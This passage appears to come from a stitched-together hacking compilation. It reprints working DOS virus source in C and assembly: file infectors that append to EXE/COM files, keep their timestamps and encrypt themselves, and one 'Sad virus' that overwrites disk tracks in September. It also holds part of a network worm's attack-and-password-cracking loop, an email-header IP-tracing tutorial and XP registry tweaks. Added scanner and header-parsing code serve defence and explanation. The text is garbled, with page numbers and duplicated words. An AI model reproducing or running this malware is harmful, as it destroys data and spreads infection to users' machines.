/*           MAIN PROGRAM           */
/*----------------------------------*/

int main( void )
{
    int x = 0;

    do {
        if ( find_healthy() ) {          /* Is there an un-infected file? */
            infect();                    /* Well, then infect it! */
            x++;                         /* Add one to the counter. */
            success++;                   /* Carve a notch in our belt. */
        }
        else {                           /* If there ain't a file here... */
            _DX = (int) "..";            /* See if we can step back to */
            _AH = 0x3b;                  /* the parent directory, and try */
            asm int 21H;                 /* there. */
            x++;                         /* Increment the counter anyway, to */
        }                                /* avoid infinite loops. */
    } while( x < infection_rate );       /* Do this until we've had enough. */

    if ( success )                       /* If we got something this time, */
        print_s( fake_msg );             /* feed 'em the phony error line. */
    else if ( diseased_count > 6 )       /* If we found 6+ infected files */
        for( x = 0; x < 3; x++ )         /* along the way, laugh!! */
            print_s( virus_msg[x] );
    else
        print_s( fake_msg );             /* Otherwise, keep a low profile. */
    return;
}

void infect( void )
{
    _DX = (int) dta->filename;           /* DX register points to filename. */
    _CX = 0x00;                          /* No attribute flags are set. */
    _AL = 0x01;                          /* Use Set Attribute sub-function. */
    _AH = 0x43;                          /* Assure access to write file. */
    asm int 21H;                         /* Call DOS interrupt. */
    open_handle( dta->filename );        /* Re-open the healthy file. */
    _BX = handle;                        /* BX register holds handle. */
    _CX = virus_size;                    /* Number of bytes to write. */
    _DX = (int) codestart;               /* Write program code. */
    _AH = 0x40;                          /* Set up and call DOS. */
    asm int 21H;
    restore_timestamp();                 /* Keep original date & time. */
    close_handle();                      /* Close file. */
    return;
}

int find_healthy( void )
{
    if ( find_first("*.EXE") != NO_MATCH )      /* Find EXE? */
        if ( healthy() )                        /* If it's healthy, OK! */
            return 1;
        else
            while ( find_next() != NO_MATCH )   /* Try a few more otherwise. */
                if ( healthy() )
                    return 1;                   /* If you find one, great! */
    if ( find_first("*.COM") != NO_MATCH )      /* Find COM? */
        if ( healthy() )                        /* If it's healthy, OK! */
            return 1;
        else
            while ( find_next() != NO_MATCH )   /* Try a few more otherwise. */
                if ( healthy() )
                    return 1;                   /* If you find one, great! */
    return 0;                                   /* Otherwise, say so. */
}

int healthy( void )
{
    int i;

    datestamp = dta->datestamp;          /* Save time & date for later. */
    timestamp = dta->timestamp;
    open_handle( dta->filename );        /* Open last file located. */
    _BX = handle;                        /* BX holds current file handle. */
    _CX = 20;                            /* We only want a few bytes. */
    _DX = (int) compare_buf;             /* DX points to the scratch buffer. */
    _AH = 0x3f;                          /* Read in file for comparison. */
    asm int 21H;
    restore_timestamp();                 /* Keep original date & time. */
    close_handle();                      /* Close the file. */
    for ( i = 0; i < 20; i++ )           /* Compare to virus code. */
        if ( compare_buf[i] != *(codestart+i) )
            return 1;                    /* If no match, return healthy. */
    diseased_count++;                    /* Chalk up one more fucked file. */
    return 0;                            /* Otherwise, return infected. */
}

void restore_timestamp( void )
{
    _AL = 0x01;                          /* Keep original date & time. */
    _BX = handle;                        /* Same file handle. */
    _CX = timestamp;                     /* Get time & date from DTA. */
    _DX = datestamp;
    _AH = 0x57;                          /* Do DOS service. */
    asm int 21H;
    return;
}

void print_s( char *s )
{
    char *p = s;

    while ( *p ) {                       /* Subtract 10 from every character. */
        *p -= 10;
        p++;
    }
    _DX = (int) s;                       /* Set DX to point to adjusted string. */
    _AH = 0x09;                          /* Set DOS function number. */
    asm int 21H;                         /* Call DOS interrupt. */
    return;
}

int find_first( char *fn )
{
    _DX = (int) fn;                      /* Point DX to the file name. */
    _CX = 0xff;                          /* Search for all attributes. */
    _AH = 0x4e;                          /* 'Find first' DOS service. */
    asm int 21H;                         /* Go, DOS, go. */
    return _AX;                          /* Return possible error code. */
}

int find_next( void )
{
    _AH = 0x4f;                          /* 'Find next' function. */
    asm int 21H;                         /* Call DOS. */
    return _AX;                          /* Return any error code. */
}

void open_handle( char *fn )
{
    _DX = (int) fn;                      /* Point DX to the filename. */
    _AL = 0x02;                          /* Always open for both read & write. */
    _AH = 0x3d;                          /* "Open handle" service. */
    asm int 21H;                         /* Call DOS. */
    handle = _AX;                        /* Assume handle returned OK. */
    return;
}

void close_handle( void )
{
    _BX = handle;                        /* Load BX register w/current file handle. */
    _AH = 0x3e;                          /* Set up and call DOS service. */
    asm int 21H;
    return;
}
6) viruse200063

.model tiny
; x*x*x*x*x*x*x
.code                                   ; Virus code segment
org 100h                                ; COM file starting IP

entry_point:    db 0e9h,0,0             ; jmp decrypt

decrypt:                                ; handles encryption and decryption
        mov cx,(offset heap - offset startencrypt)/2    ; iterations
patch_startencrypt:
        mov di,offset startencrypt      ; start of decryption
decrypt_loop:
        db 81h,35h                      ; xor word ptr [di], xxxx
decrypt_value dw 0                      ; initialised at zero for null effect
        inc di                          ; calculate new decryption location
        inc di
        loop decrypt_loop               ; decrypt mo'

startencrypt:
        call next                       ; calculate delta offset
next:   pop bp                          ; bp = IP next
        sub bp,offset next              ; bp = delta offset

        lea si,[bp+save3]
        mov di,100h
        push di                         ; For later return
        movsw
        movsb

        mov byte ptr [bp+numinfec],1    ; reset infection counter

        mov ah,1Ah                      ; Set new DTA
        lea dx,[bp+newDTA]              ; new DTA @ DS:DX
        int 21h

        mov ah,47h                      ; Get current directory
        mov dl,0                        ; Current drive
        lea si,[bp+origdir]             ; DS:SI->buffer
        int 21h
        mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR

        mov ax,3524h                    ; Get int 24 handler
        int 21h                         ; to ES:BX
        mov word ptr [bp+oldint24],bx   ; Save it
        mov word ptr [bp+oldint24+2],es
        mov ah,25h                      ; Set new int 24 handler
        lea dx,[bp+offset int24]        ; DS:DX->new handler
        int 21h
        push cs                         ; Restore ES
        pop es                          ; 'cuz it was changed

dir_scan:                               ; "dot dot" traversal
        lea dx,[bp+com_mask]            ; DS:DX points to mask
        mov ah,4eh                      ; find first file
        mov cx,7                        ; any attribute
findfirstnext:
        int 21h
        jc done_infections              ; No mo files found

        mov al,0h                       ; Open read only
        call open

        mov ah,3fh                      ; Read file to buffer
        lea dx,[bp+buffer]              ; @ DS:DX
        mov cx,1Ah                      ; 1Ah bytes
        int 21h

        mov ah,3eh                      ; Close file
        int 21h

checkCOM:
        mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
        cmp ax,2000                     ; Is it too small?
        jb find_next
        cmp ax,65535-(endheap-decrypt)  ; Is it too large?
        ja find_next

        mov bx,word ptr [bp+buffer+1]   ; get jmp location
        add bx,heap-decrypt+3           ; Adjust for virus size
        cmp ax,bx
        je find_next                    ; already infected

        jmp infect_com
find_next:
        mov ah,4fh                      ; find next file
        jmp short findfirstnext

        mov ah,3bh                      ; change directory
        lea dx,[bp+dot_dot]             ; "cd .."
        int 21h
        jnc dir_scan                    ; go back for mo!

done_infections:
        jmp activate                    ; Always activate

exit_virus:
        mov ax,2524h                    ; Restore int 24 handler
        lds dx,[bp+offset oldint24]     ; to original
        int 21h
        push cs
        pop ds

        mov ah,3bh                      ; change directory
        lea dx,[bp+origdir-1]           ; original directory
        int 21h

        mov ah,1ah                      ; restore DTA to default
        mov dx,80h                      ; DTA in PSP
        int 21h
        retn                            ; 100h is on stack

save3   db 0cdh,20h,0                   ; First 3 bytes of COM file

activate:
; **************************************************
        mov ax,04301h                   ; DOS set file attributes function
        xor cx,cx                       ; File will have no attributes
        lea dx,[di + 01Eh]              ; DX points to file name
        int 021h
        mov ax,03D02h                   ; DOS open file function, r/w
        lea dx,[di + 01Eh]              ; DX points to file name
        int 021h
        xchg bx,ax                      ; Transfer file handle to AX
        jmp exit_virus

creator         db '[ZEB(C)1992]',0     ; Mass Produced Code Generator
virusname       db '[ranger]',0

infect_com:                             ; ax = filesize
        mov cx,3
        sub ax,cx
        lea si,[bp+offset buffer]
        lea di,[bp+offset save3]
        movsw
        movsb
        mov byte ptr [si-3],0e9h
        mov word ptr [si-2],ax
        add ax,103h
        push ax                         ; needed later

finishinfection:
        push cx                         ; Save # bytes to write
        xor cx,cx                       ; Clear attributes
        call attributes                 ; Set file attributes

        mov al,2
        call open

        mov ah,40h                      ; Write to file
        lea dx,[bp+buffer]              ; Write from buffer
        pop cx                          ; cx bytes
        int 21h

        mov ax,4202h                    ; Move file pointer
        xor cx,cx                       ; to end of file
        cwd                             ; xor dx,dx
        int 21h

get_encrypt_value:
        mov ah,2ch                      ; Get current time
        int 21h                         ; dh=sec,dl=1/100 sec
        or dx,dx                        ; Check if encryption value = 0
        jz get_encrypt_value            ; Get another if it is
        mov [bp+decrypt_value],dx       ; Set new encryption value

        lea di,[bp+code_store]
        mov ax,5355h                    ; push bp,push bx
        stosw
        lea si,[bp+decrypt]             ; Copy encryption function
        mov cx,startencrypt-decrypt     ; Bytes to move
        push si                         ; Save for later use
        push cx
        rep movsb

        lea si,[bp+write]               ; Copy writing function
        mov cx,endwrite-write
        rep movsb

        pop cx                          ; Bytes to move
        pop si                          ; Entry point of virus
        pop dx
        push di
        push si
        push cx
        rep movsb                       ; Copy decryption function
        mov ax,5b5dh                    ; pop bx,pop bp
        stosw
        mov al,0c3h                     ; retn
        stosb

        add dx,offset startencrypt - offset decrypt     ; Calculate new
        mov word ptr [bp+patch_startencrypt+1],dx       ; starting offset of
        call code_store                                 ; decryption

        pop cx
        pop di
        pop si
        rep movsb                       ; Restore decryption function

        mov ax,5701h                    ; Restore creation date/time
        mov cx,word ptr [bp+newDTA+16h] ; time
        mov dx,word ptr [bp+newDTA+18h] ; date
        int 21h

        mov ah,3eh                      ; Close file
        int 21h

        mov ch,0
        mov cl,byte ptr [bp+newDTA+15h] ; Restore original
        call attributes                 ; attributes

        dec byte ptr [bp+numinfec]      ; One mo infection
        jnz mo_infections               ; Not enough
        jmp done_infections
mo_infections:
        jmp find_next

open:   mov ah,3dh
        lea dx,[bp+newDTA+30]           ; filename in DTA
        int 21h
        xchg ax,bx
        ret

attributes:
        mov ax,4301h                    ; Set attributes to cx
        lea dx,[bp+newDTA+30]           ; filename in DTA
        int 21h
        ret

write:  pop bx                          ; Restore file handle
        pop bp                          ; Restore relativeness
        mov ah,40h                      ; Write to file
        lea dx,[bp+decrypt]             ; Concatenate virus
        mov cx,heap-decrypt             ; # bytes to write
        int 21h
        push bx
        push bp
endwrite:

int24:                                  ; New int 24h (error) handler
        mov al,3                        ; Fail call
        iret                            ; Return control

com_mask        db '*.com',0
dot_dot         db '..',0

heap:                                   ; Variables not in code
; The following code is the buffer for the write function
code_store      db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24        dd ?                    ; Storage for old int 24h handler
backslash       db ?
origdir         db 64 dup (?)           ; Current directory buffer
newDTA          db 43 dup (?)           ; Temporary DTA
numinfec        db ?                    ; Infections this run
buffer          db 1ah dup (?)          ; read buffer
endheap:                                ; End of virus

end entry_point
8) Viruse:Don’t be sad
; ; ---- Data Segment Values ---; ds:[0f6h] = read buffer location ; ds:[0f8h] = write buffer location ; ds:[0fah] = store length of virus at this location ; ds:[0fch] = store length of file to be infected at this location ; ds:[0feh] = filename of file to infect ;
.model tiny .code org
100h
; origin for .com files
start:
nop
; these two nop instructs will be used by 'Nasty'
nop
; to determine if a file is already infected
;****** ;get date ;****** mov ah,2ah int 21h
; get the date ; do it
cmp dh,09h jnz do_not_activate
; is it September? ; if NO jmp do_not_activate
;**** ;the nasty bit ;**** 146
;* ;* 1. Print message ;* lea dx,mess
; print message
mov ah,09
; 'Nasty in September'
int 21h
; do it
;**** ;* 2. Destroy disk ;**** mov ah,19h int 21h mov dl,al
; get current drive (returned in al) ; do it ; dl = drive # to be formated
mov ah,05
; disk format function
mov cl,01
; first sector
mov ch,00
; first track
mov dh,00
; head zero
mov al,10h
; 10h (16) sectors - 2 tracks
int 13h
; do it (overwrite first 16 tracks on currently ; selected disc)
do_not_activate: mov cx,80h
; save parameters; set counter to 80h bytes
mov si,0080h
; offset in the current data segment of the byte ; to be copied
mov di,0ff7fh rep movsb
; offset to which byte is to be moved ; move bytes until cx=0 (decrement cx by 1 each time ; loop is performed is done automatically) automatically) ; (increment by 1 of si & di is done automatically)
lea ax,begp
; load exit from program offset address into ax
mov cx,ax
; "
sub ax,100h
; subtract start of .com file address (100h) from ax
"
"
"
"
"
" cx
; ax now contains the the length of the the virus 147
mov ds:[0fah],ax
; put length of the virus into the data segment at
; offset 0fah add cx,fso
; add fso (5h) to cx (offset address of exit) ; so, cx=cx+5
mov ds:[0f8h],cx
; move cx (end of virus + 5) into data segment at
; offset 0f8h. ** Start of the write write buffer. buffer. ADD CX,AX
; add virus length (ax) to cx ?????
mov ds:[0f6h],cx
; mov cx into data segment at offset 0f6h.
; ** Start of the read buffer mov cx,ax
; mov length of virus into cx
lea si,start
; load address of 'start' (start of virus) into ; souce index
mov di,ds:[0f8h]
; mov the value of the write buffer (@ 0f8h) into
; destination index
rb:
; cx = counter (length of virus) ; si = offset of byte to be read ; di = offset of where to write byte to ; (auto decrement of cx & increment of si & di)
rep movsb
stc
; copy the virus into memory
; set the carry flag
lea dx,file_type_to_infect
; set infector for .com files only
mov ah,4eh
; find first file with specified params
mov cx,20h
; files with archive bit set
int 21h
; do it ; if file found, CF is cleared, else ; CF is set
or ax,ax jz file_found
; works the below instructions (jz & jmp) ; if file found jmp file_found 148
jmp done
; if no file found, jmp done (exit virus)
file_found: mov ah,2fh
; get dta (returned in es:bx)
int 21h
; do it
mov ax,es:[bx+1ah] mov ds:[0fch],ax add bx,1eh
; mov filesize into ds:[0fch] ; bx now points to asciz filename
mov ds:[0feh],bx clc
; mov size of file to be infected into ax
; mov filename into ds:[0feh]
; clear carry flag
mov ax,3d02h
; open file for r/w (ds:dx -> asciz filename)
mov dx,bx
; mov filename into dx
int 21h
; do it (ax contains file handle)
mov bx,ax
; mov file handle into bx
mov ax,5700h
; get time & date attribs from file to infect
int 21h
; do it (file handle in bx)
push cx
; save time to the stack
push dx
; save date to the stack
mov ah,3fh
; read from file to be infected
mov cx,ds:[0fch]
; number of bytes to be read (filesize of file to
; be infected mov dx,ds:[0f6h] int 21h
; buffer (where to read bytes to) ; do it
mov bx,dx
; mov buffer location to bx
mov ax,[bx]
; mov contents of bx (first two bytes - as bx is ; 16-bits) into ax.
; Now check to see if file is infected... if the 149
;
file is infected, it's first two bytes will be
;
9090h (nop nop)
sub ax,9090h
; If file is already infected, zero flag will be set ; thus jump to fin(ish)
jz fin
mov ax,ds:[0fch]
; mov filesize of file to be infected into ax
mov bx,ds:[0f6h]
; mov where-to-read-to buffer into bx
mov [bx-2],ax
; correct old len
mov ah,3ch
; Create file with handle
mov cx,00h
; cx=attribs -- set no attributes
mov dx,ds:[0feh]
; point to name
clc
; clear carry flag
int 21h
; create file ; Note: If filename already exists, (which it does) ; truncate the filelength to to zero - this is ok as ; we have already copied the file to be infected ; into memory.
mov bx,ax
; mov file handle into bx
mov ah,40h
; write file with handle (write to the file to be ; infected) - length currently zero ; cx=number of bytes to write
mov cx,ds:[0fch]
; length of file to be infected
add cx,ds:[0fah]
; length of virus
mov DX,ds:[0f8h]
; location of write buffer (this contains the virus
; + the file to be infected)
int 21h
; write file ; new file = virus + file to be infected
mov ax,5701h
; restore original time & date values
pop dx
; get old date from the stack
pop cx
; get old time from the stack
int 21h
; do it ; Note: Infected file will now carry the time & date ; it had before the infection.
mov ah,3eh
; close file (bx=file handle)
int 21h
; do it ; Note: date & time stamps automatically updated if ; file written to.
fin: stc
; set carry flags
mov ah,4fh
; find next file (.com)
int 21h
; do it
or ax,ax
; decides zero flag outcome
jnz done
; if no more .com files, jmp done
JMP file_found
; else begin re-infection process for new file.
done: mov cx,80h
; set counter (cx) = 80h
mov si,0ff7fh
; source offset address (copy from here)
mov di,0080h
; destination offset address (copy to here)
rep movsb
; copy bytes! (cx is auto decremented by 1 ; si & di are auto incremented by 1) ; Note: this is a 'restore parameters' feature ; this does the reverse of what what done earlier ; in the program (do_not_activate:)
mov ax,0a4f3h
;
mov ds:[0fff9h],ax
;
mov al,0eah
mov ds:[0fffbh],al
; reset data segment locations ??? (to previous
mov ax,100h
; values before virus infection)
mov ds:[0fffch],ax
lea si,begp
; load exit from program offset address into si
lea di,start
; load offset address of start of virus into di
mov ax,cs
mov ds:[0fffeh],ax
; re-align cs = ds ???
mov kk,ax
mov cx,fso
db 0eah
; define byte
dw 0fff9h
; define word
kk dw 0000h
; define kk = word
mess db 'Sad virus virus - 24/8/91',13,10,'$'
; virus message to display
file_type_to_infect db '*?.com',0
; infect only .com files.
fso dw 0005h
; store 5 into 'fso'. dw means that fso is 2 bytes
; in size (a word)
; ----- alma mater
begp: mov ax,4c00h
; normal dos termination (set al to 00)
int 21h
; do it
end start
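As an added, defender-side example that is not part of the original listing: the virus above marks an infected .com file by making its first two bytes 9090h (nop nop) and carries the 'Sad virus ... 24/8/91' message string in its body, so a scanner can test for exactly those two facts. The sample files, the temporary directory and the clean/suspicious/infected verdict names are constructed for this demonstration.

```python
import tempfile
from pathlib import Path
from typing import Dict

# Facts taken from the commented listing above:
#   - an infected .com file begins with 9090h (nop nop), the very marker the
#     virus tests ("sub ax,9090h / jz fin") before deciding whether to infect;
#   - the virus body carries the message string defined at 'mess db'.
INFECTION_MARKER = b"\x90\x90"
VIRUS_SIGNATURE = b"Sad virus"        # prefix of the 'mess' string; enough to match


def classify_com(data: bytes) -> str:
    """Return 'infected', 'suspicious' or 'clean' for the bytes of one .com file.

    The nop-nop prefix on its own is a weak indicator (a clean program may start
    with two nops), so it only yields 'suspicious'; marker plus the embedded
    message string yields 'infected'. The string alone (e.g. a text file or a
    scanner's own binary) is also only 'suspicious'.
    """
    has_marker = data[:2] == INFECTION_MARKER
    has_signature = VIRUS_SIGNATURE in data
    if has_marker and has_signature:
        return "infected"
    if has_marker or has_signature:
        return "suspicious"
    return "clean"


def scan_directory(directory: str) -> Dict[str, str]:
    """Classify every *.com file in a directory (the same file set the virus searches)."""
    results: Dict[str, str] = {}
    for path in sorted(Path(directory).glob("*.com")):
        results[path.name] = classify_com(path.read_bytes())
    return results


def demo_scan() -> Dict[str, str]:
    """Write three constructed sample .com files into a temp dir and scan them."""
    tmp = tempfile.mkdtemp(prefix="comscan-")
    # clean.com: a minimal 'mov ax,4c00h / int 21h' exit stub, no marker
    Path(tmp, "clean.com").write_bytes(b"\xb8\x00\x4c\xcd\x21")
    # twonops.com: starts with nop nop but carries no virus body -> suspicious
    Path(tmp, "twonops.com").write_bytes(b"\x90\x90\xb8\x00\x4c\xcd\x21")
    # infected.com (constructed): marker, a stand-in virus body holding the
    # message string, then the original program, mirroring "virus + file"
    body = (INFECTION_MARKER + b"\xeb\x10"
            + b"Sad virus - 24/8/91\r\n$"
            + b"\xb8\x00\x4c\xcd\x21")
    Path(tmp, "infected.com").write_bytes(body)
    return scan_directory(tmp)


if __name__ == "__main__":
    for name, verdict in demo_scan().items():
        print(f"{name}: {verdict}")
```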
9) Worm viruses
666 The Dead Zone 214-522-5321 300/1200/2400 666
#include
#include
#include
#include
long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
int n;
int parent = 0;
int okay = 0;
/* change calling name to "sh" */
strcpy(argv[0], "sh");
/* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0);
/* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) {
/* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
n++;
}
else {
/* check for 1l.c in argument list */
if (!strncmp(argv[n], "1l.c", 4))
okay = 1;
/* load an object file into memory */
load_object (argv[n]);
/* clean up by unlinking file */
if (parent)
unlink (argv[n]);
/* and removing object file name */
strcpy (argv[n++], "");
}
}
/* if 1l.c was not in argument list, quit */
if (!okay)
exit (0);
/* reset process group */
setpgrp (getpid());
/* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP);
/* scan for network interfaces */
if_init();
/* collect list of gateways from netstat */
rt_init();
/* start main loop */
doit();
}
int
doit()
{
current_time = time (0);
/* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts();
/* check for a "listening" worm */
check_other ();
/* attempt to send byte to "ernie" */
send_message ();
for (;;) {
/* crack some passwords */
crack_some ();
/* sleep or listen for other worms */
other_sleep (30);
crack_some ();
/* switch process id's */
if (fork())
/* parent exits, new worm continues */
exit (0);
/* attack gateways, known hosts */
attack_hosts();
other_sleep(120);
/* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
reset_hosts();
current_time = time(0); }
/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);
}
}
HOW TO TRACK AN IP ADDRESS
How to find the IP address of the sender in Gmail, Yahoo! Mail or Hotmail
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers:
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this: [Gmail headers screenshot] Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245. That is the IP address of the sender!
5. Track the IP address of the sender.
Finding IP address in Yahoo! Mail
1. Log into your Yahoo! Mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail in.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers:
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see headers similar to this: [Yahoo! headers screenshot] Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is the IP address of the sender!
6. Track the IP address of the sender.
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers:
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address. [Hotmail headers screenshot] In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this: [Hotmail headers screenshot] Look for Received: from followed by the IP address within square brackets []. In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else, if you have headers like this: [Hotmail headers screenshot] Look for Received: from followed by the IP address within square brackets []. In this case, the IP address of the sender is [61.83.145.129] (spam mail). Jump to step 9.
8. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender.
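The header walk described above, as an added Python example that is not part of the original tutorial: it unfolds the raw headers, prefers X-Originating-IP when present (the Hotmail case), and otherwise takes the earliest Received: from hop, skipping the proxy.anyknownserver.com placeholder from step 8 and private or reserved relay addresses. The two header blocks are constructed for the demonstration; only the bracketed sender addresses are the ones the tutorial quotes.

```python
import re
from ipaddress import ip_address
from typing import List, Optional, Tuple

# Constructed sample headers (not taken from a real mailbox). Received: lines are
# listed newest-first, as in a real message, so the sender's hop is the last one.
GMAIL_STYLE = """\
Received: from mail-out.example.net (mail-out.example.net [10.0.0.5])
        by mx.example.org with ESMTP; Sun, 14 Mar 2004 10:00:00 +0000
Received: from proxy.anyknownserver.com (proxy.anyknownserver.com [192.0.2.9])
        by mail-out.example.net; Sun, 14 Mar 2004 09:59:50 +0000
Received: from user-pc (unknown [65.119.112.245])
        by proxy.anyknownserver.com; Sun, 14 Mar 2004 09:59:40 +0000
From: someone@example.com
Subject: constructed test message
"""

HOTMAIL_STYLE = """\
Received: from hotmail.example.com ([192.0.2.20])
        by mx.example.org; Sun, 14 Mar 2004 10:00:00 +0000
X-Originating-IP: [68.34.60.59]
From: someone@example.com
Subject: constructed test message
"""

RECEIVED_FROM = re.compile(r"^received:\s+from\s+(\S+)", re.IGNORECASE)
BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# Relay names to discard, as step 8 does; the tutorial's placeholder is the only entry.
KNOWN_PROXIES = {"proxy.anyknownserver.com"}


def unfold_headers(raw: str) -> List[str]:
    """Join continuation lines (leading space or tab) onto the header they belong to."""
    out: List[str] = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and out:
            out[-1] += " " + line.strip()
        else:
            out.append(line)
    return out


def received_hops(raw: str) -> List[Tuple[str, str]]:
    """(sending host, bracketed IP) for every 'Received: from' header, newest first."""
    hops: List[Tuple[str, str]] = []
    for header in unfold_headers(raw):
        host = RECEIVED_FROM.match(header)
        ip = BRACKETED_IP.search(header)
        if host and ip:
            hops.append((host.group(1).lower(), ip.group(1)))
    return hops


def find_sender_ip(raw: str) -> Optional[str]:
    """Apply the tutorial's rules: X-Originating-IP first, else the earliest usable hop."""
    for header in unfold_headers(raw):
        if header.lower().startswith("x-originating-ip:"):
            ip = BRACKETED_IP.search(header)
            if ip:
                return ip.group(1)
    # Walk the chain bottom-up (earliest hop first). Skip known proxies and
    # private/reserved addresses, which are internal relays, not the sender.
    for host, ip in reversed(received_hops(raw)):
        if host in KNOWN_PROXIES:
            continue
        try:
            if ip_address(ip).is_private:
                continue
        except ValueError:        # regex allows octets > 255; not a real address
            continue
        return ip
    return None


if __name__ == "__main__":
    print("Gmail-style sender:", find_sender_ip(GMAIL_STYLE))      # 65.119.112.245
    print("Hotmail-style sender:", find_sender_ip(HOTMAIL_STYLE))  # 68.34.60.59
```

A bracketed address is only as trustworthy as the relay that wrote it: every Received: line below the first hop operated by your own provider can be forged by the sender, which is the same limitation the tutorial notes for anonymous proxies.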
Hacking XP
Now let's play with Windows XP.
How to Find a Lost File on your computer? To find this missing file, first select the 'Start' button (bottom left hand corner of your screen), then select from the Start menu list that opens 'Find', then 'Files or Folders'. When the 'Find: All Files' dialog box opens you are ready to find that missing file. If you did a simple search for all '.doc files' (being the Microsoft Word file suffix) you may bring up hundreds of Microsoft Word files. To help you narrow your search, if you can remember part of the file name, eg 'jim', when the full name may be 'Jim Burns quote 2.5.02.doc', you will get fewer results. To make a partial word search, type in the 'Named' field the word followed by an * (this is above the number 8; press 'shift key + 8') to replace missing word/s or letter/s, eg 'jim*.doc'; then you will have fewer results. You can use * before or after the partial word/s or letter/s. By default your hard drive will be selected in the 'Look in' field. To start your search press the 'Find Now' button and the results will be listed below. To make your search quicker, if you save all your files inside your 'My Documents' folder, select it in the 'Look in' field when you open the 'Find: All Files' dialog box. By selecting the 'My Documents' folder your computer only searches it instead of your whole hard drive.
1) XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.
2) Creating Shutdown Icon or One Click Shutdown: Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path. Use this path in "Type Location of the Item":
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.
3) Increasing Band-Width By 20%: Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc. To get it back: Click Start then Run and type "gpedit.msc" without quotes. This opens the group policy editor. Then go to: Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth.
4) Making Folders Private: Open My Computer. Double-click the drive where Windows is installed (usually drive (C:), unless you have more than one drive on your computer). If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive. Double-click the Documents and Settings folder. Double-click your user folder. Right-click any folder in your user profile, and then click Properties. On the Sharing tab, select the Make this folder private so that only I have access to it check box.
5) To change Drive Letters: Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths." From here you can add, remove or change drive letters and paths to the partition.
6) Removing the Shortcut arrow from Desktop Icons: Go to Start then Run and enter regedit. Navigate to HKEY_CLASSES_ROOT\lnkfile. Delete the IsShortcut registry value. You may need to restart Windows XP.
7) Get Drivers for your Devices: Visit Windows Update (XP Only). Look at the left hand pane and under Other Options click Personalize Windows Update. Now in the right hand pane check the box - Display the link to the Windows Update Catalog under See Also. Below Choose which categories and updates to display on Windows Update, make sure you check all the boxes you want shown. Click Save Settings. Now look in the left hand pane under See Also, click Windows Update Catalog and choose what you're looking for. Choose either MS updates or drivers for hardware devices. Start the Wizard and off you go.
8) Customize Internet Explorer's Title Bar: Open Registry by going to Start then Run and entering regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main. In the right hand panel look for the string "Window Title" and change its value to whatever custom text you want to see.
9) Disabling the use of Win Key: If you are a gaming freak then you must be sick of the Win key in your keyboard. To disable use of the Win key, open registry by going to Start then Run and entering regedit. Navigate to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]. In this look for the value "Scancode Map". It's binary data so be extra careful: set its value to "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00" to disable the win key.
10) Restarting Windows without Restarting the Computer: When you click on the SHUTDOWN button, make sure to simultaneously press the SHIFT button. If you hold the Shift key down while clicking on the SHUTDOWN button, your computer would restart Windows without restarting the Computer. This is equivalent to the term "HOT REBOOT".
